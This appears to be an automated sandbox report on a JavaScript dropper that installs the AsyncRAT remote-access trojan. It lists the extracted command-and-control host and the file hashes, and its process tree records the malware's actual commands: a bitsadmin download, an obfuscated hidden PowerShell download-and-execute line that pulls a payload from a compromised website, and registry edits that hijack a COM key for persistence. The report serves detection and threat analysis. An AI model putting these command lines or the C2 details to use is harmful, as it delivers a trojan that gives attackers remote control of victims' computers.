Overview

overview

10

Static

static

1

28-55-63-12.JS.js

windows7-x64

3

28-55-63-12.JS.js

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-03-2023 19:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    28-55-63-12.JS.js

  • Size

    120KB

  • MD5

    c9d2d5758ea0bc1c82bf466b68fad4ee

  • SHA1

    30daf976e08feb0ecbb6a10958d09a6e2da2bcf8

  • SHA256

    b2aab26d36c289c0922a8cde64767571c9fec6daa765caee23a9b2c1fe7c0b17

  • SHA512

    20f3509e7cb2ebf00e1bd0a91c4fab0981cf8b90cb088abde8da63b36f785471466503edd820acbc033fdc11832ae8e3af3d9d09257f1cd0ac19d28bc0bf983a

  • SSDEEP

    384:xXWXWXWXWXWXWXWXWXWXWXWXEXWXWXWXWXWXWXWXWXWXWXWX0XWXWXWXWXWXWXWZ:i/dNx

Score
10/10
asyncratcairopersistencerat

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

Cairo

C2

admincairo.linkpc.net:7707

Mutex

AsyncMutex_move

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\28-55-63-12.JS.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\System32\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://theemirateshills.com//wp-includes/js/information.txt C:\Users\Admin\AppData\Local\TempVB
      2⤵
      • Download via BitsAdmin
      PID:4176
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\TempVB
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2176
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI $FRJX36='IeX(NeW-OBJeCT NeT.W';$GSX='eBCLIeNT).DOWNLO';Sleep 1;[BYTe[]];Sleep 3;$SCV='UGYDS(''https://theemirateshills.com//wp-includes/js/moos2.png'')'.RePLACe('UGYDS','ADSTRING');Sleep 1;IeX($FRJX36+$GSX+$SCV);IEx([IO.File]::$a($T))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3344
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI $FRJX36='IeX(NeW-OBJeCT NeT.W';$GSX='eBCLIeNT).DOWNLO';Sleep 1;[BYTe[]];Sleep 3;$SCV='UGYDS(''https://theemirateshills.com//wp-includes/js/moos2.png'')'.RePLACe('UGYDS','ADSTRING');Sleep 1;IeX($FRJX36+$GSX+$SCV);IEx([IO.File]::$a($T))
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4340
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.ps1'"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2156
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.vbs"
              6⤵
                PID:2896
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.bat
      1⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3896
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.bat""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:220
        • C:\Windows\system32\reg.exe
          REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
          3⤵
          • Modifies registry class
          • Modifies registry key
          PID:2192
        • C:\Windows\system32\reg.exe
          REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
          3⤵
          • Registers COM server for autorun
          • Modifies registry class
          • Modifies registry key
          PID:3920
        • C:\Windows\system32\cmd.exe
          cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\YPSPPQWKQDKPVWZHQCIIQZ.ps1'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2376
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\YPSPPQWKQDKPVWZHQCIIQZ.ps1'"
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4128
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:3676

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.bat
      Filesize

      706B

      MD5

      9999b95750b6f959dd0c3d4c7954f0ee

      SHA1

      22c4a26421cca8e30640ba82e0ef8b15d2a6237e

      SHA256

      9e728f939da712b6b01a3fab1965e4ae4c4f5cb58a25c948d29cf3c8dcc1dab3

      SHA512

      216408cc11036e3e62751962a850f53051e3804fdcc58ccd82b78d94952101bed9cae208e65508b167cfe2a6e71d045bd7daf391f39223c3029a65b2916eef88

      Download Submit
    • C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.ps1
      Filesize

      3KB

      MD5

      4aa84ac8d8e1cb6f117e22afa522c7db

      SHA1

      7a8b3f44f002409efff5a108be66018547879531

      SHA256

      97cb4dd1f0737cf5628bcf0fe1ab310765ba991b00a5520d53e1b1afef0e874b

      SHA512

      b88a472648e2a9810b1f57a62414055a947549b8645f2bf407404ed69c2b8043b942ef775050791bd482ab0b13ee6192e3b638eef77cd9c4fdec3e08ae306cca

      Download Submit
    • C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\TZOQCBINLOLHJQAPYIDAJV.vbs
      Filesize

      1KB

      MD5

      ffe187f86e83d51950c02f4dbbaa90f8

      SHA1

      b95682b36a27379ccd792d27a16967e881f4646d

      SHA256

      9bf3960d7875ec6f1547a480bc22dd0040d715620377422ca3aef9f0536ea093

      SHA512

      e6bac9e3c25707fef9ea7491bd69428fa2ee322bbc40e9b024fbb217120163dbb1e937f59bfd51e96f887fbc944aba3d3c59e8600900a1443733cd52af7db026

      Download Submit
    • C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV\YPSPPQWKQDKPVWZHQCIIQZ.ps1
      Filesize

      680KB

      MD5

      a0a0a7ebc8ad48aaf27cd5bcc77e387c

      SHA1

      3d84c33469f32a6bdc6158e36d5961d41de36600

      SHA256

      ad0d6f8a3e0d461e59b6288f417092e3f9d4f39706f51711d5597708d187117c

      SHA512

      1f74b19ebf00756dcc80c8381cd2a3f920731a69158752620a58b18acf3879f26abbc8e1931adcba2afd25639cf618fb3f9643871460bbbe0897f047e73e660e

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      00e7da020005370a518c26d5deb40691

      SHA1

      389b34fdb01997f1de74a5a2be0ff656280c0432

      SHA256

      a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

      SHA512

      9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      e9334471cfa4286c5d38fd73f401a126

      SHA1

      2e21574c51b3b72ac7fd659c056bc1670407d54b

      SHA256

      976e2a80c6ff22329214f5da7b69e68e107fdccb8d1cc722a5153052aac59995

      SHA512

      854f6074125bb7e077e77b0125089e622715ef30069453653ea474972a9768621065ed0fe32e75ee22d0e4eaf075baf811b9aebd4e707854c6379e0854383fd1

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      31cc3034d46ced022839bf0308e7f14b

      SHA1

      653e3b33306205109a6ba8667224f2da6b038046

      SHA256

      33de6de3be3190b3a7f28d7e72c54cd5b411cb507ce2c52633cf499f5f88e323

      SHA512

      decd0cdd917f30b6bafc583fe2821566e5b4e30913676feb7ad6e0f8f64cd554e3386aa1c28f531ff37e6b58041740ab6d5931c51b3da35446c2f1741df8769f

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      d8b9a260789a22d72263ef3bb119108c

      SHA1

      376a9bd48726f422679f2cd65003442c0b6f6dd5

      SHA256

      d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

      SHA512

      550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mck5ci4h.sq4.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • memory/2156-158-0x00000130B1570000-0x00000130B1580000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2156-166-0x00000130B1570000-0x00000130B1580000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3676-242-0x0000000005C90000-0x0000000005C9A000-memory.dmp
      Filesize

      40KB

      Download
    • memory/3676-243-0x0000000006800000-0x000000000689C000-memory.dmp
      Filesize

      624KB

      Download
    • memory/3676-244-0x0000000006760000-0x00000000067C6000-memory.dmp
      Filesize

      408KB

      Download
    • memory/3676-241-0x0000000005CB0000-0x0000000005D42000-memory.dmp
      Filesize

      584KB

      Download
    • memory/3676-240-0x0000000006070000-0x0000000006614000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/3676-239-0x0000000003270000-0x0000000003280000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3676-245-0x0000000003270000-0x0000000003280000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3676-234-0x0000000000400000-0x0000000000416000-memory.dmp
      Filesize

      88KB

      Download
    • memory/3896-168-0x0000021781620000-0x0000021781630000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3896-197-0x0000021781620000-0x0000021781630000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3896-167-0x0000021781620000-0x0000021781630000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4128-214-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-208-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-210-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-216-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-218-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-220-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-222-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-224-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-226-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-228-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-230-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-232-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-233-0x000002D4DEA90000-0x000002D4DEA91000-memory.dmp
      Filesize

      4KB

      Download
    • memory/4128-212-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-206-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-204-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-202-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-200-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-199-0x000002D4DEA70000-0x000002D4DEA90000-memory.dmp
      Filesize

      128KB

      Download
    • memory/4128-198-0x000002D4DE660000-0x000002D4DE670000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4128-196-0x000002D4DE660000-0x000002D4DE670000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4340-143-0x000001A4FF570000-0x000001A4FF580000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4340-138-0x000001A4FF540000-0x000001A4FF562000-memory.dmp
      Filesize

      136KB

      Download
    • memory/4340-144-0x000001A4FF570000-0x000001A4FF580000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4340-145-0x000001A4FF570000-0x000001A4FF580000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4340-147-0x000001A4FF570000-0x000001A4FF580000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4340-148-0x000001A4FF570000-0x000001A4FF580000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4340-149-0x000001A4FF570000-0x000001A4FF580000-memory.dmp
      Filesize

      64KB

      Download